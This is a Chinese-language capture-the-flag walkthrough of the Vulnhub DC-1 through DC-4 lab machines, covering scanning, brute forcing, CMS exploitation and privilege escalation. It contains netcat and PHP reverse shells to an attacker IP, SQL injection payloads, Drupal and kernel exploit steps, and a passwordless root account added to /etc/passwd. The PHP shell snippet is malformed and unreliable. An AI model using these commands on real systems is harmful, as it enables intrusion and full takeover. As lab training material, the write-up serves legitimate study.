DC靶機1-9合集
DC1
文章前提概述
本文介紹DC-1靶機的滲透測試流程
涉及知識點(比較基礎):
nmap掃描網段端口服務
msf的漏洞搜索
drupal7的命令執行利用
netcat反向shell
mysql的基本操做
sudi提權php
基本環境搭建
靶機下載地址:http://www.five86.com/downloads/DC-1.zip
https://download.vulnhub.com/dc/DC-1.zip
VMware(windows):https://www.52pojie.cn/thread-1026907-1-1.html
選擇高版本的vmware,否則可能不支持ova導入
下載導入開機vmware設置選擇nat模式,目的讓你的攻擊機和靶機在一個網段,能夠根據網絡環境自行設置只要在一個網段就行。css
基礎信息收集
nmap掃描
nmap -A 192.168.124.0/24
掃描結果
開發80,111,22ssh端口html
Host is up (0.00039s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 37454/udp status | 100024 1 39208/udp6 status | 100024 1 52048/tcp status |_ 100024 1 57763/tcp6 status MAC Address: 00:0C:29:A6:59:A3 (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.39 ms 192.168.124.145
先爆破一下ssh吧(無結果)
nmap --script=ssh-brute 192.168.124.145
訪問80端口
嘗試了註冊,登陸的弱密碼,修改密碼,無效,但發現admin用戶存在
wappalyzer指紋識別,發現室Drupal系統
node
去漏洞庫和msf搜索一下
msfconsole search Drupal
發現有漏洞能夠用那就開始msf吧
使用2018年的漏洞吧,是個遠程代碼執行(代碼審計如今真心看不懂,😔)
https://www.exploit-db.com/exploits/44482
https://paper.seebug.org/567/
python
msf發現鏈接成功
use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS 192.168.124.145 run
尋找一下flag
shell find / -name flag*
/home/flag4 /home/flag4/flag4.txt /var/www/flag1.txt
打開flag1.txt試試mysql
cat /var/www/flag1.txt
翻譯一下:每個好的CMS都須要一個配置文件--你也同樣。
搜索Drupal的配置文件
/var/www/sites/default/settings.php,打開linux
cat /var/www/sites/default/settings.php
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
發現了flag2和數據庫的帳號密碼,嘗試鏈接一下
先弄一下交互shell吧nginx
python -c 'import pty;pty.spawn("/bin/bash")'
鏈接數據庫嘗試一下git
mysql -u dbuser -p R0ck3t
查看一下node和user表,發現flag3
select * from node; select * from users;
爲何要看node表呢???(user表就不說了吧)
由於drupal node機制
drupal node機制理解
so,嘗試得到登陸的密碼,hash值破解可能不太現實
咱們註冊一個帳號將兩者hash互換不就能夠了
我丟不行,註冊無法寫密碼,
那找到加密腳本本身加密一個不就好了
加密腳本位置github
scripts/password-hash.sh
php scripts/password-hash.sh admin password: admin hash: $S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.
嘗試更換管理員密碼的hash
update users set pass='$S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.' where name='admin';
下面登陸測試一下,帳號admin密碼admin
在content中發現
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
也就是說咱們須要尋找密碼,並且提示shadow,以前的flag4還沒看
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
應該是讓得到管理員權限,再去/etc/shadow看看
嘗試給權限,仍是不行
那隻能嘗試提權了
suid提權
SUID是set uid的簡稱,它出如今文件所屬主權限的執行位上面,標誌爲 s 。當設置了SUID後,UMSK第一位爲4。咱們知道,咱們帳戶的密碼文件存放在/etc/shadow中,而/etc/shadow的權限爲 ----------。也就是說:只有root用戶能夠對該目錄進行操做,而其餘用戶連查看的權限都沒有。當普通用戶要修改本身的密碼的時候,可使用passwd這個指令。passwd這個指令在/bin/passwd下,當咱們執行這個命令後,就能夠修改/etc/shadow下的密碼了。那麼爲何咱們能夠經過passwd這個指令去修改一個咱們沒有權限的文件呢?這裏就用到了suid,suid的做用是讓執行該命令的用戶以該命令擁有者即root的權限去執行,意思是當普通用戶執行passwd時會擁有root的權限,這樣就能夠修改/etc/passwd這個文件了。
參考文章:Linux下的用戶、組和權限
已知的可用來提權的linux可行性的文件列表以下:
nmap,vim,find,bash,more,less,nano,cp
發現系統上運行的全部SUID可執行文件
不一樣系統適用於不一樣的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
嘗試查看find是否有suid權限
/usr/bin/find /tmp -exec whoami \;
find 命令說明
-exec 參數後面跟的是command命令,它的終止是以;爲結束標誌的,因此這句命令後面的分號是不可缺乏的,考慮到各個系統中分號會有不一樣的意義,因此前面加反斜槓。-exec參數後面跟的就是咱們想進一步操做的命令,so,咱們能夠以root的權限命令執行了
反彈一個shell,固然find和執行命令,咱們也能夠返回一個root的netcat的後門
/usr/bin/find ./aaa -exec '/bin/sh' \;
/usr/bin/find ./aaa -exec netcat -lvp 4444 -e "/bin/sh" \; netcat 192.168.124.145 4444
最後,得到最後一個flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
參考文章
freebuf:https://www.freebuf.com/articles/network/218073.html
知乎:https://zhuanlan.zhihu.com/p/135342104
W3:https://medium.com/@w3rallmachines/dc-1-vulnhub-walkthrough-3a2e7042c640
DC2
環境搭建
靶機下載地址:http://www.five86.com/downloads/DC-2.zip
基本信息收集
nmap基本掃描,發現ip地址192.168.124.146,開發端口80,使用的wordpress框架
nmap -A 192.168.124.0/24
Nmap scan report for dc-2 (192.168.124.146) Host is up (0.00036s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site |_https-redirect: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:94:8C:B4 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
對端口進一步掃描,發現開發了7744端口(不清楚是什麼服務,因該是ssh吧):
nmap -sS 192.168.124.146 -p 1-65535
Nmap scan report for dc-2 (192.168.124.146) Host is up (0.00094s latency). Not shown: 65533 closed ports PORT STATE SERVICE 80/tcp open http 7744/tcp open raqmon-pdu
訪問192.168.124.146發現訪問不了,這裏須要改下本地的dns
linux: vim /etc/hosts windows: C:\Windows\System32\drivers\etc
訪問果真是個wordpress框架
flag1
發現有flag,點進去,提示用cewl來獲取密碼,全部應該是爆破密碼之類的,且提示本身的密碼字典可能無效,且有時無法得到全部密碼,提示用其餘的身份去登陸
那還說什麼cewl搞起
cewl是經過爬行網站獲取關鍵信息建立一個密碼字典
cewl http://dc-2/index.php/flag/ -w dict.txt -w 輸出的文件名稱
發現主題是wordpress,那就掃描一下用戶吧,提示密碼了,因該是讓登陸
使用wpscan工具:
WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它採用Ruby編寫,可以掃描WordPress網站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress自己的漏洞。最新版本WPScan的數據庫中包含超過18000種插件漏洞和2600種主題漏洞,而且支持最新版本的WordPress。值得注意的是,它不只可以掃描相似robots.txt這樣的敏感文件,並且還可以檢測當前已啓用的插件和其餘功能。
該掃描器能夠實現獲取站點用戶名,獲取安裝的全部插件、主題,以及存在漏洞的插件、主題,並提供漏洞信息。同時還能夠實現對未加防禦的Wordpress站點暴力破解用戶名密碼。
枚舉一下用戶,枚舉出admin,jerry,tom
wpscan --url http://dc-2 --enumerate u
[+] URL: http://dc-2/ [192.168.124.146] [+] Started: Sat Nov 7 02:23:05 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> [+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <====================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
爆破一下用戶名和密碼
touch users.txt
將用戶名admin,jerry,tom存入
用剛剛抓取的密碼字典和用戶字典進行爆破
wpscan --url http://dc-2/ -U users.txt -P dict.txt
[!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient
成功爆破出了兩個用戶名和密碼,沒有admin的
嘗試登陸,登陸成功,且在page中發現flag2
提示沒法利用wordpress採起捷徑,嘗試令一種方法,以前nmap掃描出了7744端口,那麼咱們是否是能夠嘗試ssh登陸
發現使用tom帳號登陸成功
ssh tom@192.168.124.146 -p 7744 password:parturient
嘗試讀取文件
發現被rbash,也就是說是被受限的shell
參考連接:freebuf
先嚐試"/"能不能用
cp命令
FTP,GDB,main,git沒有,發現vi能夠用,那就試試被
vi test set shell=/bin/sh shell
更改PATH或SHELL環境變量
查看 export -p
export HOME='/home/tom' export LANG='en_US.UTF-8' export LOGNAME='tom' export MAIL='/var/mail/tom' export PATH='/home/tom/usr/bin' export PWD='/home/tom' export SHELL='/bin/rbash' export SHLVL='1' export SSH_CLIENT='192.168.124.139 51336 7744' export SSH_CONNECTION='192.168.124.139 51336 192.168.124.146 7744' export SSH_TTY='/dev/pts/1' export TERM='xterm-256color' export USER='tom' export VIM='/usr/share/vim' export VIMRUNTIME='/usr/share/vim/vim74' export _='whoami'
修改path
export PATH="/usr/sbin:/usr/bin:/rbin:/bin"
打開flag3.txt發現,提示要切換用戶到jerry
切換用戶,home發現flag4
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. 😃
Go on - git outta here!!!!
這裏提示git提權
sudo git help config
成功獲取root權限,讀取文件
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
參考文章
DC3
靶場搭建
靶場的下載:http://www.five86.com/downloads/DC-3-2.zip
基本信息收集
nmap -sS A 192.168.124.0/24
Nmap scan report for 192.168.124.147 Host is up (0.00041s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home MAC Address: 00:0C:29:EF:73:10 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.41 ms 192.168.124.147
對端口的進一步掃描,沒有發現其餘的端口
nmap 192.168.124.147
訪問192.168.124.147的80端口,發現提示,和cms是joomla
使用joomscan進行進一步掃描
它是一個Joomla掃描儀。 它將幫助網絡開發人員和網站管理員幫助肯定已部署的Joomla網站可能存在的安全漏洞。
安裝joomscan(kali中) apt-get install joomscan joomscan --url http://192.168.124.147
也可以使用CMSseek進一步掃描
安裝CMSseek git clone https://github.com/Tuhinshubhra/CMSeeK 使用 python3 cmseek.py --url 192.168.124.147
信息同樣
搜索joomla漏洞
searchsploit joomla 3.7.0
打開查看漏洞詳情
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
查看發現存在sql注入,具體漏原理seebug
簡單來講就是
com_fields組件,對請求數據沒有進行過濾,從而致使sql注入,未過濾位置
測試一下
http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)
sqlmap進行注入
爆數據庫名 sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" --dbs
爆表名 qlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" --tables
爆字段名 sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" -T "#__users" --columns
爆數據 sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" -T "#__users" -C name,password --dump
嘗試破解密碼
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
建立文件 echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test 爆破密碼 john test john test --show
John the Ripper (「JtR」) 是一個很是有用的工具。這是一個快速的密碼破解,適用於Windows和許多Linux系統。它具備不少功能,對於不少密碼破解均有奇效。
登陸寫shell頁面
登陸網站:http://192.168.124.147/administrator/
編寫新頁面
點擊編寫
new file編寫
蟻劍連接
嘗試提權
嘗試suid提權
find / -perm -u=s -type f 2>/dev/null
發現沒有可提權程序
嘗試命令提權,發現咩用
嘗試linux內核提權
uname -a cat /etc/issue
尋找內核提權腳本
searchsploit Ubuntu 16.04
嘗試一下
cat \usr\share\exploitdb\exploits\linux\local\39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;
for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
[checks for bad instructions]
f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}
[...]
}
}
[...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}
return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
提示有exp的地址,下載
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
解壓上傳到靶機目錄,解壓
tar -xf exploit.tar cd ebpf_mapfd_doubleput_exploit ./compile.sh
先反彈一下交互形的shell
建立一個phpshell.php文件,寫入
<?php
system("$sock=fsockopen(\"192.168.124.139\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");");
?>
kali端
netcat -l -p 4444
蟻劍執行
php phpshell.php
kali收到反彈的shell
執行剛剛編譯的exp
提權成功
尋找flag root下
成功得到flag
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
參考文章
http://www.javashuo.com/article/p-zwnkvlay-nw.html
https://www.exploit-db.com/exploits/44227
DC4
靶場的搭建
靶場下載地址:https://download.vulnhub.com/dc/DC-4.zip
基本信息收集
nmap掃描網段
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.148 Host is up (0.00022s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA) | 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA) |_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519) 80/tcp open http nginx 1.15.10 |_http-server-header: nginx/1.15.10 |_http-title: System Tools MAC Address: 00:0C:29:40:C9:C1 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.124.148
獲得基本信息開放了80,ssh端口,操做系統Debian
先爆破一下ssh吧(無結果)
nmap --script=ssh-brute 192.168.124.148
查看80端口,發現不是cms,是個登陸框,提醒admin登陸
嘗試sql,burpsuite跑一下字典沒結果,那我再跑一下看看有過濾沒(我丟仍是啥結果沒有),看來沒有注入呀
讓我百度一下題解,我丟,暴力破解密碼可還行,那是時候祭出我100w的大字典了(heng!)
再見沒爆破出來直接看答案(我一點也不happy),看來字典有的落後了
帳號:admin 密碼:happy
登陸進去
嘗試登陸發現是個命令執行功能,抓包看看,更改一下ls,發現能讀取文件,那先讀取comment看看是怎麼執行的
我丟,直接shell_exec(),那直接反彈shell
nc 192.168.124.139 4444 -e /bin/bash kali端 netcat -l -p 4444
反彈一下交互shell
python -c 'import pty;pty.spawn("/bin/sh")'
發現密碼
在下面目錄發現old-passwords.bak
/home/jim/backups
說是old密碼,打開
cat old-passwords.bak 000000 12345 iloveyou 1q2w3e4r5t 1234 123456a qwertyuiop monkey 123321 dragon 654321 666666 123 myspace1 a123456 121212 1qaz2wsx 123qwe 123abc tinkle target123 gwerty 1g2w3e4r gwerty123 zag12wsx 7777777 qwerty1 1q2w3e4r 987654321 222222 qwe123 qwerty123 zxcvbnm 555555 112233 fuckyou asdfghjkl 12345a 123123123 1q2w3e qazwsx loveme1 juventus jennifer1 !~!1 bubbles samuel fuckoff lovers cheese1 0123456 123asd 999999999 madison elizabeth1 music buster1 lauren david1 tigger1 123qweasd taylor1 carlos tinkerbell samantha1 Sojdlg123aljg joshua1 poop stella myspace123 asdasd5 freedom1 whatever1 xxxxxx 00000 valentina a1b2c3 741852963 austin monica qaz123 lovely1 music1 harley1 family1 spongebob1 steven nirvana 1234abcd hellokitty thomas1 cooper 520520 muffin christian1 love13 fucku2 arsenal1 lucky7 diablo apples george1 babyboy1 crystal 1122334455 player1 aa123456 vfhbyf forever1 Password winston chivas1 sexy hockey1 1a2b3c4d pussy playboy1 stalker cherry tweety toyota creative gemini pretty1 maverick brittany1 nathan1 letmein1 cameron1 secret1 google1 heaven martina murphy spongebob uQA9Ebw445 fernando pretty startfinding softball dolphin1 fuckme test123 qwerty1234 kobe24 alejandro adrian september aaaaaa1 bubba1 isabella abc123456 password3 jason1 abcdefg123 loveyou1 shannon 100200 manuel leonardo molly1 flowers 123456z 007007 password. 321321 miguel samsung1 sergey sweet1 abc1234 windows qwert123 vfrcbv poohbear d123456 school1 badboy 951753 123456c 111 steven1 snoopy1 garfield YAgjecc826 compaq candy1 sarah1 qwerty123456 123456l eminem1 141414 789789 maria steelers iloveme1 morgan1 winner boomer lolita nastya alexis1 carmen angelo nicholas1 portugal precious jackass1 jonathan1 yfnfif bitch tiffany rabbit rainbow1 angel123 popcorn barbara brandy starwars1 barney natalia jibril04 hiphop tiffany1 shorty poohbear1 simone albert marlboro hardcore cowboys sydney alex scorpio 1234512345 q12345 qq123456 onelove bond007 abcdefg1 eagles crystal1 azertyuiop winter sexy12 angelina james svetlana fatima 123456k icecream popcorn1
生成爆破字典,爆破ssh
使用hydra,進行爆破,hydra是著名黑客組織thc的一款開源的暴力密碼破解工具,能夠在線破解多種密碼。
破解ssh: hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh 破解ftp: hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
爆破ssh hydra -l jim -P passwd.txt -t 10 ssh://192.168.124.148
爆出ssh登陸密碼
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-10 08:38:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
[DATA] attacking ssh://192.168.124.148:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 142 to do in 00:02h, 10 active
[STATUS] 80.00 tries/min, 160 tries in 00:02h, 92 to do in 00:02h, 10 active
[22][ssh] host: 192.168.124.148 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-10 08:41:16
ssh帳號:jim密碼:jibril04
提示有個mail
讀取一下信封
/var/mail/jim
告訴了咱們帳號密碼
Password is: ^xHhA&hvim0y See ya, Charles
切換一下用戶
su charles
查看可以root執行的命令
sudo -l
發有可以以root執行的teehee命令,而teehee的做用是能夠向文件中追加內容
提權
將帳號寫入/etc/passwd中
密碼設置爲空
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
對於admin::0:0:::/bin/bash的解釋
[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登陸shell]
參考文章
也能夠不將密碼設置爲空
mkpasswd -m SHA-512 12345
而後
sudo teehee -a /etc/passwd 12345:$6$OXVv4N3qtVc0LQeI$CPmgAD9tTpzpCu86IaC9gIx6MYta8/huc3utEd3WwyhUWSbDxKIwi/3XCAHjOqn.rT/lamYZTxbKDoJXkxXaa1:0:0:::/bin/bash
其中-e 相似等於>>
而後切換用戶
cat /root/flag.txt
